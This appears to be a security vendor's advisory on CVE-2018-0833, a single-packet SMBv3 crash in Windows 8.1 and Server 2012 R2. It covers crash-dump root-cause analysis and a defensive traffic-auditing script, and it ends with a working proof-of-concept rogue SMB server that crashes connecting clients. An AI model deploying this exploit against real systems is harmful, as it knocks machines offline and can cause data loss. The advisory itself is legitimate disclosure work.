After last year's Server Message Block (SMB) upheaval, this year a new denial-of-service vulnerability has been discovered in SMBv3 which can be exploited to crash Windows 8.1 and Windows Server 2012 R2 machines with a single packet. This vulnerability has been assigned CVE-2018-0833.


Technical Jargon:

The negotiation of an SMBv3 session always starts with an SMBv2 session. The SMB2 TRANSFORM_HEADER is used by the client or server to encrypt messages, and it is only valid for SMBv3; an encrypted message is recognised by its ProtocolId, which begins with 0xFD instead of the 0xFE that starts a plain SMB2 header.

As the packet captures above show, from the 9th frame onward encryption is in effect and the header byte sequence begins with 0xFD. Now what happens if an SMB packet with a 0xFD header is sent even before the session has been negotiated?

All hell breaks loose and the system goes crashing down with no option but to restart it to restore functionality.

Let’s dig in a little deeper and seek out the root cause of it.

Analyzing the crash dump in WinDbg, the analysis says "Probably caused by : mrxsmb.sys ( mrxsmb!SmbWskReceiveEvent+8539 )". The crash occurred in the mrxsmb.sys module, which is the Microsoft Server Message Block (SMB) redirector. The exact location is mrxsmb!SmbWskReceiveEvent+8539, where a move from [ecx+30h] into register EAX is executed while ECX holds 0x00000000.

The crash occurs because ECX is a NULL pointer, so the instruction tries to read from address 0x00000030, which is not valid, mapped memory for the kernel. The resulting access violation leads to a kernel panic (bugcheck) and forces a restart.
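From the defender's side, the condition described above is observable on the wire: an SMB2 transform header (0xFD 'SMB') is only legitimate after a NEGOTIATE and SESSION_SETUP exchange has established an SMB 3.x session, and its OriginalMessageSize field must agree with the length of the encrypted payload that follows. The following Python script is an added example, not code from the original post or from SecPod; it walks the messages of one TCP connection (both directions merged in arrival order) and flags transform headers that arrive before any session was set up or whose header fields are inconsistent. Header layouts follow MS-SMB2 (2.2.1 and 2.2.41); the sample byte streams are constructed here, and the per-connection state machine is deliberately simplified (it does not follow dialect negotiation or verify signatures).

```python
import struct

# SMB2 header and transform-header constants (MS-SMB2 2.2.1 / 2.2.41)
SMB2_MAGIC = b"\xfeSMB"          # plain SMB2 header ProtocolId
TRANSFORM_MAGIC = b"\xfdSMB"     # SMB2 TRANSFORM_HEADER ProtocolId (SMB 3.x only)
SMB2_HEADER_LEN = 64
TRANSFORM_HEADER_LEN = 52
SMB2_NEGOTIATE = 0x0000
SMB2_SESSION_SETUP = 0x0001


def split_frames(stream):
    """Split a raw TCP byte stream into SMB messages using the NetBIOS session
    service prefix: one zero byte followed by a 24-bit big-endian length."""
    frames, off = [], 0
    while off + 4 <= len(stream):
        length = struct.unpack(">I", stream[off:off + 4])[0] & 0x00FFFFFF
        body = stream[off + 4:off + 4 + length]
        if len(body) < length:
            break  # truncated frame; would wait for more data on a live socket
        frames.append(body)
        off += 4 + length
    return frames


def audit_stream(stream):
    """Return a list of alert strings for one connection's SMB messages."""
    alerts = []
    negotiated = False
    session_set_up = False
    for idx, msg in enumerate(split_frames(stream)):
        if msg[:4] == SMB2_MAGIC and len(msg) >= SMB2_HEADER_LEN:
            command = struct.unpack_from("<H", msg, 12)[0]  # Command field at offset 12
            if command == SMB2_NEGOTIATE:
                negotiated = True
            elif command == SMB2_SESSION_SETUP and negotiated:
                session_set_up = True
        elif msg[:4] == TRANSFORM_MAGIC:
            if not session_set_up:
                alerts.append("frame %d: transform header (0xFD 'SMB') before any "
                              "session was set up" % idx)
            if len(msg) < TRANSFORM_HEADER_LEN:
                alerts.append("frame %d: transform header shorter than %d bytes"
                              % (idx, TRANSFORM_HEADER_LEN))
            else:
                # OriginalMessageSize sits at offset 36 (after ProtocolId, Signature, Nonce)
                orig_size = struct.unpack_from("<I", msg, 36)[0]
                if orig_size != len(msg) - TRANSFORM_HEADER_LEN:
                    alerts.append("frame %d: OriginalMessageSize %d does not match "
                                  "payload length %d"
                                  % (idx, orig_size, len(msg) - TRANSFORM_HEADER_LEN))
    return alerts


# --- constructed sample traffic (not captures from the original post) ---

def nb(body):
    """Wrap an SMB message in a NetBIOS session service frame."""
    return struct.pack(">I", len(body)) + body


def smb2_message(command):
    """Minimal 64-byte SMB2 header carrying only the Command field."""
    hdr = SMB2_MAGIC + struct.pack("<HHIHH", SMB2_HEADER_LEN, 0, 0, command, 0)
    return hdr.ljust(SMB2_HEADER_LEN, b"\x00")


def transform_message(payload_len, session_id=0x1234):
    """Well-formed transform header (signature and nonce zeroed) plus payload."""
    hdr = (TRANSFORM_MAGIC + b"\x00" * 16 + b"\x00" * 16
           + struct.pack("<IHHQ", payload_len, 0, 0x0001, session_id))
    return hdr + b"\x00" * payload_len


# A 0xFD message padded with 'A' bytes arriving right after the client's first
# NEGOTIATE, mimicking the shape described in the post (constructed, not its bytes).
EARLY_TRANSFORM = nb(smb2_message(SMB2_NEGOTIATE)) + nb(TRANSFORM_MAGIC + b"A" * 100)

# A normal SMB 3.x exchange: negotiate and session setup in both directions,
# then an encrypted message.
NORMAL_SESSION = (nb(smb2_message(SMB2_NEGOTIATE)) + nb(smb2_message(SMB2_NEGOTIATE))
                  + nb(smb2_message(SMB2_SESSION_SETUP)) + nb(smb2_message(SMB2_SESSION_SETUP))
                  + nb(transform_message(80)))

if __name__ == "__main__":
    for name, stream in (("early transform", EARLY_TRANSFORM), ("normal session", NORMAL_SESSION)):
        print(name, "->", audit_stream(stream) or "no alerts")
```

The length check is the important one for this bug class: a transform header whose OriginalMessageSize (0x41414141 in the padded sample) bears no relation to the bytes actually present is exactly the kind of message a receiver should reject before it touches any session state.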


Exploitation Technique:

To exploit this vulnerability an attacker can host a malicious SMB server and then deceive the target into sending an SMB session request to that server, which replies with a crafted response and causes the client system to crash.


Proof-of-Concept:

import SocketServer
from binascii import unhexlify

# Crafted reply: a 4-byte NetBIOS length prefix (0x000000ec) followed by an
# SMB2 transform header (0xFD 'SMB') padded with 0x41 bytes. The hex string is
# split across lines purely for readability (adjacent literals are concatenated).
payload = ('000000ecfd534d42414141414141414141414141414141414141414141414141414'
           '141414141414141414141414141414141414141414141414141414141414141414141414141414'
           '141414141414141414141414141414141414141414141414141414141414141414141414141414'
           '141414141414141414141414141414141414141414141414141414141414141414141414141414'
           '141414141414141414141414141414141414141414141414141414141414141414141414141414'
           '141414141414141414141414141414141414141414141414141414141414141414141414141414'
           '14141414141414141414141')

class byebye(SocketServer.BaseRequestHandler):
    def handle(self):
        try:
            print "From:", self.client_address
            print "[*]Sending Payload..."
            # Send the crafted message as the first reply, before any negotiation
            self.request.send(unhexlify(payload))
        except Exception:
            print "BSoD Triggered on", self.client_address

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445), byebye)
launch.serve_forever()

Impact:

The system crashes and does not regain functionality until it is rebooted. This can affect organizations, since unexpected crashes may lead to data loss, delays, forced system reboots, and so on.


Solution:
To mitigate this critical vulnerability Microsoft has released a security patch. Download the security patch for the respective affected operating systems from Microsoft's advisory for CVE-2018-0833.


SecPod Saner detects these vulnerabilities and automatically fixes them by applying the security updates. Download Saner now and keep your systems updated and secure.

Article name: Windows SMB Blue Screen Of Death (BSOD)